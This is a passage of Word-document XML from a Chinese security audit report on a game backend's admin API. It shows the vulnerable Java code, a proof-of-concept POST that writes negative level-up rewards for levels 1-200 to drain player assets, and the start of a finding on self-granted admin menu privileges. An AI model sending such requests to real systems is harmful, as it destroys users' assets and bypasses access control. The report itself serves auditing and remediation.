        <w:t xml:space="preserve">分支时，均未校验奖励值必须 &gt; 0，直接将攻击者传入的负数值写入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>LevelRewardConfig.rewardValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与此形成鲜明对比的是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>单级别保存接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>saveLevelReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 显式做了正值校验：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saveLevelReward 中：有正值守护</w:t>
              <w:br/>
              <w:t>if (req.getGoldReward() != null &amp;&amp; req.getGoldReward().compareTo(BigDecimal.ZERO) &gt; 0) { ... }</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>if (req.getPowerRewardPercent() != null &amp;&amp; req.getPowerRewardPercent().compareTo(BigDecimal.ZERO) &gt; 0) { ... }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>batchUpdateLevelRewards</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的对应逻辑完全缺失：</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batchUpdateLevelRewards 中：无任何正值守护</w:t>
              <w:br/>
              <w:t>if (req.getGoldReward() != null &amp;&amp; Integer.valueOf(REWARD_TYPE_GOLD).equals(c.getRewardType())) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    c.setRewardValue(req.getGoldReward());  // ← 直接写入，goldReward 可为负</w:t>
              <w:br/>
              <w:t xml:space="preserve">    changed = true;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一旦负数奖励配置写入数据库，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>所有到达对应等级的玩家</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在升级时都会触发该配置，导致其游戏资产（金币/算力/矿机）被批量扣减，且该行为对玩家完全无感（系统执行的是正常升级奖励发放流程）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>此外，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>LevelRewardBatchUpdateRequest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 Controller 入口参数缺少 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Valid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Validated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 注解：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ApiResponse&lt;Void&gt; batchUpdateLevelRewards(@RequestBody LevelRewardBatchUpdateRequest req)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>// 无 @Valid，@NotNull、@Min(1)、@Max(200) 注解均不生效</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">这意味着 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>powerRewardPercent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等字段上即便有注解也不会被 Bean Validation 框架触发校验，输入值完全不受约束。</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p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数据从 HTTP 请求体流入，经 Controller 直传 Service，在 Service 内无任何正值过滤，直接持久化进数据库：</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入口：GameValueController.java</w:t>
              <w:br/>
              <w:t>// LevelRewardBatchUpdateRequest 可控字段：</w:t>
              <w:br/>
              <w:t>//   BigDecimal goldReward;           ← 无正值约束注解，可传负数</w:t>
              <w:br/>
              <w:t>//   BigDecimal powerRewardPercent;   ← 无正值约束注解，可传负数</w:t>
              <w:br/>
              <w:t>//   Integer    minerReward;          ← 无正值约束注解，可传负整数</w:t>
              <w:br/>
              <w:t>//   Integer    minerCount;           ← 无正值约束注解</w:t>
              <w:br/>
              <w:t>@PostMapping("/levelRewards/batchUpdate")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; batchUpdateLevelRewards(@RequestBody LevelRewardBatchUpdateRequest req) {  // ← @Valid 缺失，Bean Validation 不生效</w:t>
              <w:br/>
              <w:t xml:space="preserve">    service.batchUpdateLevelRewards(req);  // ← 污点直传 Service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 核心逻辑：GameValueManageService.java → batchUpdateLevelRewards</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void batchUpdateLevelRewards(LevelRewardBatchUpdateRequest req) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    int start = req.getStartLevel();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    int end = req.getEndLevel();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (int level = start; level &lt;= end; level++) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        List&lt;LevelRewardConfig&gt; existing = levelRewardConfigRepository.findByLevel(level);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        for (LevelRewardConfig c : existing) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            boolean changed = false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (req.getGoldReward() != null &amp;&amp; Integer.valueOf(REWARD_TYPE_GOLD).equals(c.getRewardType())) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                c.setRewardValue(req.getGoldReward());  // ← 漏洞点：goldReward 负数直接写入，无 &gt; 0 校验</w:t>
              <w:br/>
              <w:t xml:space="preserve">                changed = true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (req.getPowerRewardPercent() != null &amp;&amp; Integer.valueOf(REWARD_TYPE_POWER).equals(c.getRewardType())) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                c.setRewardValue(req.getPowerRewardPercent());  // ← 漏洞点：powerRewardPercent 负数直接写入</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            changed = true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (req.getMinerReward() != null &amp;&amp; Integer.valueOf(REWARD_TYPE_MINER).equals(c.getRewardType())) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                c.setRewardValue(BigDecimal.valueOf(req.getMinerReward()));  // ← 漏洞点：minerReward 负数直接写入</w:t>
              <w:br/>
              <w:t xml:space="preserve">                changed = true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (changed) levelRewardConfigRepository.save(c);  // ← 负数奖励持久化落库</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // 新建分支同样无正值校验</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (req.getGoldReward() != null &amp;&amp; existing.stream().noneMatch(e -&gt; Integer.valueOf(REWARD_TYPE_GOLD).equals(e.getRewardType()))) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            levelRewardConfigRepository.save(</w:t>
              <w:br/>
              <w:t xml:space="preserve">                createLevelReward(level, REWARD_TYPE_GOLD, req.getGoldReward(), 0, req.getRewardDesc(), null)  // ← 负数 goldReward 新建写入</w:t>
              <w:br/>
              <w:t xml:space="preserve">            );</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (req.getMinerReward() != null &amp;&amp; existing.stream().noneMatch(e -&gt; Integer.valueOf(REWARD_TYPE_MINER).equals(e.getRewardType()))) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            LevelRewardConfig minerCfg = createLevelReward(level, REWARD_TYPE_MINER,</w:t>
              <w:br/>
              <w:t xml:space="preserve">                BigDecimal.valueOf(req.getMinerReward()), 0, req.getRewardDesc(), null);  // ← 负数 minerReward 新建写入</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">            levelRewardConfigRepository.save(minerCfg);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 对比参照：GameValueManageService.java → saveLevelReward（有正值校验）</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void saveLevelReward(LevelRewardSaveRequest req) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (req.getGoldReward() != null &amp;&amp; req.getGoldReward().compareTo(BigDecimal.ZERO) &gt; 0) {  // ← 此处有守护，batchUpdate 路径缺失</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        toSave.add(crea</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>teLevelReward(...));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (req.getPowerRewardPercent() != null &amp;&amp; req.getPowerRewardPercent().compareTo(BigDecimal.ZERO) &gt; 0) {  // ← 此处有守护，batchUpdate 路径缺失</w:t>
              <w:br/>
              <w:t xml:space="preserve">        toSave.add(createLevelReward(...));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</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/gameValueManage/levelRewards/batchUpdate HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;管理员有效Token&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "startLevel": 1,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "endLevel": 200,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "goldReward": -999999,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "powerRewardPercent": -100,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "minerReward": -10,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "minerCount": -5,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "rewardDesc": "Level Up Reward"</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252"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">以具有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/gameValueManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 访问权限的管理员账号获取有效 Bearer Token（可通过正常管理后台登录获取）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="253"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">构造上述 POST 请求，将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>powerRewardPercent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 均设为大额负数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>startLevel=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>endLevel=200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 覆盖全部等级</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">接口返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，1~200 级的所有奖励配置均被写入负值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="255"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>此后，任意玩家触发 1~200 级升级时，游戏奖励发放系统按负值奖励配置执行，玩家每次升级反而扣除金币/算力/矿机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>由于升级奖励是正常游戏流程，玩家和监控系统难以感知，资产将持续损失直至配置被人工发现并修正</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：全服所有等级段的奖励配置被批量写入负值，玩家升级时触发资产扣减，造成系统性游戏资产损失。</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257"/>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258"/>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管理员账号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（路径 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/gameValueManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 受 AdminAuthFilter + Spring Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>authenticated()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 双重保护）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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若项目中金币（gold）、矿机（miner）、算力（power）等游戏资产可兑换真实货币或具有直接货币价值，负数奖励将导致所有活跃玩家的资产系统性损失；即使资产无直接货币价值，也将造成严重的游戏经济体系破坏。</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259"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GameValueController.java.batchUpdateLevelRewards → GameValueManageService.java.batchUpdateLevelRewards → GameValueManageService.java.saveLevelReward → GameValueManageService.java.createLevelReward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audit_m123_359_batchUpdateLevelRewards_ctrl-path1of3.md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：MenuManageService.java#saveAdminMenus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_13" w:id="13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞12：非超管账号可向自身无限制写入任意高权限菜单，实现垂直越权提权</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="26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：非超管账号自我菜单权限提升（垂直越权）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="26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src/main/java/com/gameBack/mjservice/service/MenuManageService.java:saveAdminMenus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="26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：垂直越权 / Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="26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6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：任意已登录的普通管理员（非超管）</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等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Controller 层的权限校验逻辑如下：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if (!Boolean.TRUE.equals(isSuper) &amp;&amp; !adminId.equals(currentAdminId)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.error(HttpStatus.FORBIDDEN.value(), "无权限修改其他管理员菜单");</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该校验的语义是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>非超管只能修改自己的菜单，不能修改别人的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。但它完全没有限制"自己能被分配哪些菜单"。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Service 层对 menuId 的唯一校验是：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if (adminMenuRepository.existsById(menuId)) { // ← 仅校验菜单存在，不校验调用方是否有权自授</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    adminUserMenuRepository.save(um);</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即只要 menuId 在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
